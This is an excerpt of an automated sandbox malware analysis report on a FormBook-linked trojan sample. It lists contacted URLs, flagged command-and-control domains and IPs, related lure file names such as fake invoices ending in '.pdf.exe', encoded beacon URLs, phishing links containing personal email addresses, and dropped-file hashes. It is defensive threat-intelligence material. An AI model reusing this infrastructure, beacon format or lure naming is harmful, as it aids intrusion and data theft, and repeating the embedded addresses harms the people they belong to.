  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
URL: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://delivery.consentmanager.net
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://static.loopia.se/shared/style/2022-extra-pages.css
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://static.loopia.se/responsive/images/iOS-114.png
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://static.loopia.se/responsive/styles/reset.css
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.Bfiworkerscomp.com
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://ac.ecosia.org/autocomplete?q=
  Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
URL: https://static.loopia.se/responsive/images/iOS-57.png
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
  Source: clip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.dmtxwuatbz.cc
  Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
  Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://i3.cdn-image.com/__media__/js/min.js?v2.3
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B
  Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URL: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
23.251.54.212 | www.anuts.top | United States | 62468 | VPSQUANUS | true
172.67.210.102 | www.dmtxwuatbz.cc | United States | 13335 | CLOUDFLARENETUS | true
213.145.228.16 | www.sandranoll.com | Austria | 25575 | DOMAINTECHNIKAT | true
194.9.94.85 | www.xn--matfrmn-jxa4m.se | Sweden | 39570 | LOOPIASE | true
5.44.111.162 | www.hprlz.cz | Germany | 45031 | PROVIDERBOXIPv4IPv6DUS1DE | false
217.160.0.106 | www.catherineviskadi.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
208.91.197.27 | www.bfiworkerscomp.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true
194.58.112.174 | www.helpers-lion.online | Russian Federation | 197695 | AS-REGRU | true
199.192.19.19 | www.telwisey.info | United States | 22612 | NAMECHEAP-NETUS | true
43.252.167.188 | www.xn--fhq1c541j0zr.com | Hong Kong | 38277 | CLINK-AS-APCommuniLinkInternetLimitedHK | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467718
Start date and time: 2024-07-04 16:51:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TOgpmvvWoj.exe (renamed because the original name is a hash value)
Original Sample Name: 4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@14/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 59
• Number of non-executed functions: 271
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ftlDDsmJxbqfWuvUNSEx.exe, PID 6932 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: TOgpmvvWoj.exe
Time | Type | Description
12:28:39 | API Interceptor | 11822899x Sleep call for process: clip.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.251.54.212 | Attendance list.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | Payment_Advice.pdf.exe | malicious | FormBook | www.anuts.top/niik/
23.251.54.212 | BL7247596940.pdf.exe | malicious | FormBook | www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
23.251.54.212 | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | www.anuts.top/niik/
172.67.210.102 | Attendance list.exe | malicious | FormBook | www.dmtxwuatbz.cc/lfkn/
213.145.228.16 | Attendance list.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.sandranoll.com/zg5v/
213.145.228.16 | Swift Message.pdf.exe | malicious | FormBook | www.sandranoll.com/cga5/
213.145.228.16 | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | www.sandranoll.com/4bud/
213.145.228.16 | Payment Details- scanslip000002343.exe | malicious | FormBook | www.sandranoll.com/4bud/
213.145.228.16 | DRAFT DOCS RSHA25491003.exe | malicious | FormBook | www.sandranoll.com/4bud/
213.145.228.16 | Payment_Advice.pdf.exe | malicious | FormBook | www.sandranoll.com/niik/
213.145.228.16 | PO.4563.0002_2024.exe | malicious | FormBook | www.sandranoll.com/4bud/
213.145.228.16 | BL7247596940.pdf.exe | malicious | FormBook | www.sandranoll.com/niik/?wp=Y4bXb&PRT4=bOhbf9nA9ANf4gKZ0D/cx2mKLKP5h5S6BzYsYRymqO0Y7ABdmDatfS6UnB5JwDymuRUltFOJ97FMgck4gZZuLOGJ5Y8WdAQExr4HhgBx2rUiFV4bYBTJf60=
213.145.228.16 | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | www.sandranoll.com/niik/
194.9.94.85 | Attendance list.exe | malicious | FormBook | www.xn--matfrmn-jxa4m.se/4hda/
194.9.94.85 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.xn--matfrmn-jxa4m.se/5m4b/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | TKHA-A88163341B.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | ORDER TKHA-A88163341B.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | D7KV2Z73zC.rtf | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.85 | Scan Doc.docx.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | product Inquiry and RFQ ART LTD.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.dmtxwuatbz.cc | Attendance list.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | Swift Copy #U00a362,271.03.Pdf.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | PO-104678522.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | NEW ORDER-RFQ#10112023Q4.exe | malicious | FormBook | 104.21.45.56
www.dmtxwuatbz.cc | NEW ORDER 75647839384.exe | malicious | FormBook | 104.21.45.56
www.sandranoll.com | Attendance list.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
www.sandranoll.com | Payment Details- scanslip000002343.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | DRAFT DOCS RSHA25491003.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Payment_Advice.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | PO.4563.0002_2024.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | BL7247596940.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
www.anuts.top | Attendance list.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | 2OdHcYtYOMOepjD.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Tekstlinie.vbs | malicious | FormBook, GuLoader | 23.251.54.212
www.anuts.top | Purchase order.pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | dMY6QiHAIpPPqiV.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Purchase order.pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | 33BMmt58Bj.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Payment_Advice.pdf.vbs | malicious | FormBook, GuLoader | 23.251.54.212
www.anuts.top | Payment_Advice.pdf.exe | malicious | FormBook | 23.251.54.212
www.xn--matfrmn-jxa4m.se | Attendance list.exe | malicious | FormBook |
                                          • 194.9.94.85
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.86
                                          SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          New Order.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          GcwoApxt8q.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          www.catherineviskadi.comAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DOMAINTECHNIKAT | Attendance list.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
DOMAINTECHNIKAT | Payment Details- scanslip000002343.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | DRAFT DOCS RSHA25491003.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Payment_Advice.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | PO.4563.0002_2024.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | BL7247596940.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
CLOUDFLARENETUS | 80TeZdsbeA6B6j4.exe | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | tYEY1UeurGz0Mjb.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | https://www.newschoolers.com/click?news=50302&u=http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f%26jobcode=739-0055%26omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055%26lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D%26cid=gcc_DM212754%26bid=268417862%26rid=1061475%26p1=%41%4E%54oniopneus.com.br/dayo/uevcx/captcha/bWF0cy5hcnRodXJzc29uQHF1aWx0ZXJjaGV2aW90LmNvbQ==$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 0NJYTCJYLo.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
CLOUDFLARENETUS | https://nmg.evlink21.net/ | malicious | Unknown | 104.21.80.92
CLOUDFLARENETUS | http://kuurza.com | malicious | Unknown | 172.67.41.60
CLOUDFLARENETUS | https://email.abad-ca.com/web/webmail4/#midlands.sales@aggregate.com | malicious | Unknown | 188.114.96.3
VPSQUANUS | Attendance list.exe | malicious | FormBook | 23.251.54.212
VPSQUANUS | AWB 112-17259653.exe | malicious | FormBook | 198.44.170.208
VPSQUANUS | Rn1AkuRExh.elf | malicious | Mirai | 103.252.20.91
VPSQUANUS | c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe | malicious | SystemBC | 198.44.190.49
VPSQUANUS | tpwinprn.dll | malicious | GhostRat | 156.235.99.47
VPSQUANUS | 6z70AuHrHI.dll | malicious | Unknown | 156.235.99.47
VPSQUANUS | PI No. LI-4325.scr.exe | malicious | FormBook | 156.235.111.63
VPSQUANUS | 2OdHcYtYOMOepjD.exe | malicious | FormBook | 23.251.54.212
VPSQUANUS | Tekstlinie.vbs | malicious | FormBook, GuLoader | 23.251.54.212
VPSQUANUS | Liquidacion por Factorizacion de Creditos.exe | malicious | FormBook, GuLoader | 107.151.241.58
PROVIDERBOXIPv4IPv6DUS1DE | Attendance list.exe | malicious | FormBook | 5.44.111.162
PROVIDERBOXIPv4IPv6DUS1DE | 62c.js | malicious | Unknown | 5.44.111.28
PROVIDERBOXIPv4IPv6DUS1DE | 62c.js | malicious | Unknown | 5.44.111.28
PROVIDERBOXIPv4IPv6DUS1DE | z8s945rPmZ.exe | malicious | SystemBC | 5.44.111.104
PROVIDERBOXIPv4IPv6DUS1DE | JJUmnnkIxSCyKik.exe | malicious | FormBook, PureLog Stealer | 93.90.186.43
PROVIDERBOXIPv4IPv6DUS1DE | De0RycaUHH.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | 5.44.111.109
PROVIDERBOXIPv4IPv6DUS1DE | 27i42a6Qag.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader | 128.127.69.76
PROVIDERBOXIPv4IPv6DUS1DE | Wp2jiU6tOK.elf | malicious | Mirai | 5.44.126.213
PROVIDERBOXIPv4IPv6DUS1DE | tSPx13a2fq.elf | malicious | Mirai, Moobot | 5.44.126.228
PROVIDERBOXIPv4IPv6DUS1DE | Product_Inquiry_#03_2023.exe | malicious | Unknown | 5.44.111.13
LOOPIASE | Attendance list.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.86
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | TKHA-A88163341B.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | ORDER TKHA-A88163341B.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe | malicious | SystemBC | 93.188.3.13
LOOPIASE | D7KV2Z73zC.rtf | malicious | FormBook | 194.9.94.85
LOOPIASE | Scan Doc.docx.doc | malicious | FormBook | 194.9.94.85
                                          No context
                                          No context
Process: C:\Windows\SysWOW64\clip.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\TOgpmvvWoj.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.993134250488098
Encrypted: true
SSDEEP: 6144:7Fx5MWQ69r7WG1hNDlrRBriqbeJ3+8NdaeeKOgkQY/UZVQ1btihB:Bx5V3WG1/PZiFDNRefn/aWtID
MD5: A3F6B9D7C03C4FB2E5137778DA6BD323
SHA1: 9F6B160FD5A4958B42DC19F28E07DB736DCAE831
SHA-256: AEA551700EA528FBC5DAC1FDE76DA8E4DDC60A1A261E5E087F21737B64EA709C
SHA-512: A3169A7D7E82AFFBC13B488B44D5C6B332C0DE8CE29F1103B02670F4683771FDFB101815D11194FEAD54A2D6063772AE515CF482DD1BB2B891D5306402A28905
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\TOgpmvvWoj.exe
File Type: data
Category: dropped
Size (bytes): 9804
Entropy (8bit): 7.604994315250385
Encrypted: false
SSDEEP: 192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOmOz9gD4cwILCLKJf:I6q+Brw/gjYKycraW4cwILCc
MD5: 7B6562F2F11AD01AA55C9A4A361A69EF
SHA1: 6A8EFAFD621AE6AC7B115C4C1C222A5F12859298
SHA-256: 6F965B72025CFFF40F1FBA5A865A2334644BC001563DEB811AF27BCEBBA952FE
SHA-512: 2FA3B73012301EA8241DE7A0023E15E25B77C7B5084D1727059594BEEB826DD4AAEEB236750810ACB09B125AF8DE46A29378124359D005C51E8FCB486A18E5ED
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\TOgpmvvWoj.exe
File Type: ASCII text, with very long lines (28756), with no line terminators
Category: modified
Size (bytes): 28756
Entropy (8bit): 3.5861928446490583
Encrypted: false
SSDEEP: 768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHt:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rb
